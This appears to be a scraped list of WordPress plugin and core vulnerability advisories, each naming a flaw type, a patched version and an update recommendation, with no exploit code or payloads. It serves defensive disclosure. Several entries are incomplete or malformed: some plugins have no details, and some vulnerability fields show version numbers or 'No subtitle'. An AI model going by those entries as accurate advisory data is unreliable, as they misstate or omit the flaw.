Plugin: Orbit Fox by ThemeIsle

Vulnerability: Improper REST Capabilities Checks
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.7.3
Recommended Action: Update to version 1.3.7.3, or a newer patched version

Plugin: Mail Masta

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Vulnerability: Authenticated (Subscriber+) Content Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Real Cookie Banner: GDPR & ePrivacy Cookie Consent

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.18.2
Recommended Action: Update to version 2.18.2, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: MainWP Code Snippets Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Ziteboard Online Whiteboard

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ziteboard Shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Membership by Supsystic

Plugin: Activity Log WinterLock

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.21
Recommended Action: Update to version 1.0.21, or a newer patched version

Plugin: Feed Statistics

Vulnerability: Cross-Site Request Forgery via init
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0.11
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.11, 2.2.2

Plugin: Currency Switcher for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Simple Staff List

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in ajaxCalculateSeveralProducts function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Razorpay for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.5.7
Recommended Action: Update to version 4.5.7, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated Stored Cross-Site Scripting via Media URL
Patched Version: 9.8.0
Recommended Action: Update to version 9.8.0, or a newer patched version

Plugin: Easy Social Share Buttons for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Google Maps in Posts

Plugin: Secondary Title

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Layer Slider

Plugin: Simple Download Monitor

Vulnerability: Missing Authorization
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: WP Dynamic Keywords Injector

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.16
Recommended Action: Update to version 2.3.16, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Social Discussions

Vulnerability: Remote File Inclusion and Full Path Disclosure
Patched Version: 6.1.2
Recommended Action: Update to version 6.1.2, or a newer patched version

Plugin: User Notes

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: nex-forms

Vulnerability: Authentication Bypass for PDF Reports
Patched Version: 7.8.8
Recommended Action: Update to version 7.8.8, or a newer patched version

Plugin: Email Templates Customizer and Designer for WordPress and WooCommerce

Vulnerability: HTML Injection
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: CSprite

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.1
Recommended Action: Update to version 4.11.1, or a newer patched version

Plugin: Login with Cognito

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Blind SQL Injection
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Help Center by BestWebSoft

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Meta Slider and Carousel with Lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Zip Extraction to Arbitrary File Upload in File Manager
Patched Version: 1.5.67
Recommended Action: Update to version 1.5.67, or a newer patched version

Plugin: Delete Duplicate Posts

Vulnerability: Missing Authorization via AJAX Actions
Patched Version: 4.9
Recommended Action: Update to version 4.9, or a newer patched version

Plugin: Wp-Insert

Vulnerability: No subtitle
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Simple Local Avatars

Vulnerability: Regular Expression Denial of Service (ReDoS)
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Custom Website Data

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: IP Metaboxes

Plugin: WP Popup Builder – Popup Forms and Marketing Lead Generation

Vulnerability: Missing Authorization and Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: post-views

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.1.3
Recommended Action: Update to version 2.6.1.3, or a newer patched version

Plugin: Contact Form With Captcha

Plugin: WP Mailster

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: 10Web Booster – Website speed optimization, Cache & Page Speed optimizer

Vulnerability: Missing Authorization to Plugin Deactivation
Patched Version: 2.8.35
Recommended Action: Update to version 2.8.35, or a newer patched version

Plugin: WHOIS

Vulnerability: Reflected Cross Site Scripting
Patched Version: 1.4.2.3
Recommended Action: Update to version 1.4.2.3, or a newer patched version

Plugin: Themify Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: CAPTCHA Bypass
Patched Version: 1.3.73
Recommended Action: Update to version 1.3.73, or a newer patched version

Plugin: WSM Downloader

Vulnerability: Domain Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related Posts for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: WP FEvents Book

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Booking Manipulation
Patched Version: 0.47
Recommended Action: Update to version 0.47, or a newer patched version

Plugin: MailMunch – Grow your Email List

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Search Analytics for WP

Vulnerability: Reflected Cross-Site Scripting via ‘render_stats_page’
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 10.6.7
Recommended Action: Update to version 10.6.7, or a newer patched version

Plugin: Cookie Law Bar

Plugin: Backup Migration

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Cross-Site Request Forgery via ‘delete’ in mooauth_client_applist_page
Patched Version: 6.24.2
Recommended Action: Update to version 6.24.2, or a newer patched version

Plugin: Simple Author Box

Vulnerability: Cross-Site Request Forgery via save_user_profile
Patched Version: 2.51
Recommended Action: Update to version 2.51, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.1.2
Recommended Action: Update to version 6.1.2, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9.149
Recommended Action: Update to version 1.9.9.149, or a newer patched version

Plugin: GS Portfolio for Envato

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Hitsteps Web Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.87
Recommended Action: Update to version 5.87, or a newer patched version

Plugin: Pro Mime Types – Manage file media types

Vulnerability: Manage file media types <= 1.0.7
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.6.13
Recommended Action: Update to version 7.6.13, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: WordPress Tooltips

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 8.2.7
Recommended Action: Update to version 8.2.7, or a newer patched version

Plugin: ShortCodes UI

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy.

Vulnerability: Authenticated (Admin+) Arbitrary Folder Deletion via Path Traversal
Patched Version: 4.5.12
Recommended Action: Update to version 4.5.12, or a newer patched version

Plugin: Address Autocomplete Using Google Place Api

Plugin: Just Custom Fields

Plugin: Stop User Enumeration

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Simple Ajax Chat – Add a Fast, Secure Chat Box

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 20220216
Recommended Action: Update to version 20220216, or a newer patched version

Plugin: Job Manager

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Arbitrary File Upload
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: The Events Calendar Countdown Addon

Vulnerability: Arbitrary Plugin Installation and Activation
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Premium Portfolio Features for Phlox theme

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: SQL Injection
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Novo-Map : your WP posts on custom google maps

Plugin: Ultimate Instagram Feed – WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Sheets to WP Table Live Sync | Google Sheets Table Plugin for WordPress with Spreadsheet Integration – FlexTable

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.13.0
Recommended Action: Update to version 2.13.0, or a newer patched version

Plugin: Contact Form DB – Elementor

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Envo Extra

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: Integration for Billingo & Gravity Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Quiz Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4.2.7
Recommended Action: Update to version 6.4.2.7, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Wholesale Suite – WooCommerce Wholesale Prices, B2B, Catalog Mode, Order Form, Wholesale User Roles, Dynamic Pricing & More

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Smart App Banner

Vulnerability: Cross-Site Request Forgery via wsl_smart_app_banner_options
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Download Monitor

Vulnerability: Directory Listing to Information Disclosure
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Comments Like Dislike

Vulnerability: Add Like/Dislike Bypass
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Jetpack VaultPress

Vulnerability: Remote Code Execution
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Interactive Polish Map

Vulnerability: Authenticated (Admi+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WooCommerce CVR Payment Gateway

Vulnerability: Missing Authorization to Authenticated (Contributor+) CVR Update
Patched Version: 6.1.0
Recommended Action: Update to version 6.1.0, or a newer patched version

Plugin: Qwizcards | online quizzes and flashcards

Vulnerability: Reflected Cross Site Scripting
Patched Version: 3.37
Recommended Action: Update to version 3.37, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery via aalDeleteLink function
Patched Version: 6.3.0.1
Recommended Action: Update to version 6.3.0.1, or a newer patched version

Plugin: Videopack

Vulnerability: Full Path Disclosure
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Remote Code Execution
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 8.6.1
Recommended Action: Update to version 8.6.1, or a newer patched version

Plugin: Twitter Cards Meta – Best Twitter Card Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Login rebuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Post Timeline

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: DirectoryPress – Business Directory And Classified Ad Listing

Vulnerability: Missing Authorization
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: SRS Simple Hits Counter

Plugin: Futurio Extra

Vulnerability: Cross-Site Request Forgery via ‘futurio_extra_reset_mod’
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Unspecified Vulnerabilities
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.51
Recommended Action: Update to version 1.1.51, or a newer patched version

Plugin: Easy Ad Manager

Plugin: Occasions

Plugin: Autoptimize

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Critical CSS Settings
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.4
Recommended Action: Update to version 0.9.4, or a newer patched version

Plugin: BuddyPress Global Search

Plugin: Spiffy Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: bbPress Members Only

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: DH – Anti AdBlocker

Vulnerability: Cross-Site Request Forgery
Patched Version: 37
Recommended Action: Update to version 37, or a newer patched version

Plugin: SysBasics Customize My Account for WooCommerce

Vulnerability: Cross-Site Request Forgery via restore_my_account_tabs
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Email Users

Plugin: MW WP Form

Vulnerability: Directory Traversal via _file_upload
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Language Translation Reset
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Brands for WooCommerce

Vulnerability: Missing Authorization to Unauthenticated Order Manipulation and Information Retrieval
Patched Version: 3.8.2.3
Recommended Action: Update to version 3.8.2.3, or a newer patched version

Plugin: WP Multiple Meta Box

Vulnerability: SQL Injection
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: ImmoPress

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 1.5.85
Recommended Action: Update to version 1.5.85, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.1.3
Recommended Action: Update to version 9.1.3, or a newer patched version

Core: WordPress

Vulnerability: Mishandling Post Meta Values via XML-RPC
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: SI Captcha Anti-spam

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Unauthenticated DOM-based Reflected Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: Pay With Tweet

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Unauthenticated Settings Update to Remote Code Execution
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Cross-Site Request Forgery via _accua_forms_form_edit_action
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Store Locator Plus® for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.5.12
Recommended Action: Update to version 4.5.12, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Cross-Site Scripting
Patched Version: 5.4.40
Recommended Action: Update to version 5.4.40, or a newer patched version

Plugin: WordPress Старт

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Slider Pro

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 119
Recommended Action: Update to version 119, or a newer patched version

Plugin: Wow Moodboard Lite

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: Simple Like Page Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Annonces

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.0.2
Recommended Action: Update to version 1.2.0.2, or a newer patched version

Plugin: Compfight

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: wp-forum

Vulnerability: Multiple SQL Injections
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Recently

Vulnerability: Arbitrary File Upload to Remote Code Exectution
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: OptionTree

Vulnerability: Object Injection Bypass
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: SB Child List

Vulnerability: Cross-Site Request Forgery via ‘sb_cl_update_settings’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Authentication Bypass
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Animator – Scroll Triggered Animations

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 3.0.11
Recommended Action: Update to version 3.0.11, or a newer patched version

Plugin: WebARX

Plugin: Advanced WordPress Reset – Debug, Recover & Reset WP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: MyBookTable Bookstore by Stormhill Media

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: AGCA – Custom Dashboard & Login Page

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Security Bypass
Patched Version: 1.9.4
Recommended Action: Update to one of the following versions, or a newer patched version: 1.9.4, 2.0.9, 2.1.4, 2.2.7, 2.3.7, 2.4.4, 2.5.2, 2.6.3, 2.7.2, 2.8.2, 2.9.3

Plugin: Tabs – Responsive Tabs with WooCommerce Product Tab Extension

Vulnerability: Unauthenticated Arbitrary Option Update
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Loan Repayment Calculator and Application Form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Denial of Service
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: My Account Page Editor

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Read
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.8.4
Recommended Action: Update to version 4.8.4, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: SQL Injection
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Page View Count

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 9.7.3.1
Recommended Action: Update to version 9.7.3.1, or a newer patched version

Plugin: TJ Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Simple JWT Login – Allows you to use JWT on REST endpoints.

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: 3DPrint

Vulnerability: Cross-Site Request Forgery to Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Protector

Plugin: Social Connect

Vulnerability: Cross-Site Scripting
Patched Version: 0.10.2
Recommended Action: Update to version 0.10.2, or a newer patched version

Plugin: Stop User Enumeration

Vulnerability: Security Bypass
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: WP Review Slider

Vulnerability: SQL Injection
Patched Version: 11.0
Recommended Action: Update to version 11.0, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.6.51
Recommended Action: Update to version 1.6.51, or a newer patched version

Plugin: WP Frontend Profile

Vulnerability: Privilege Escalation
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: HTML5 Audio Player- Best WordPress Audio Player Plugin

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Defa Online Image Protector Free Edition

Plugin: CPO Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sales Report Email for WooCommerce

Vulnerability: Missing Authorization for Email Functionality
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via save
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WP Better Permalinks

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: MPL-Publisher — Ebook & Audiobook Creator

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.30.3
Recommended Action: Update to version 1.30.3, or a newer patched version

Plugin: Tweet Wheel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.3.3
Recommended Action: Update to version 1.0.3.3, or a newer patched version

Plugin: SearchWP Live Ajax Search

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Link Library

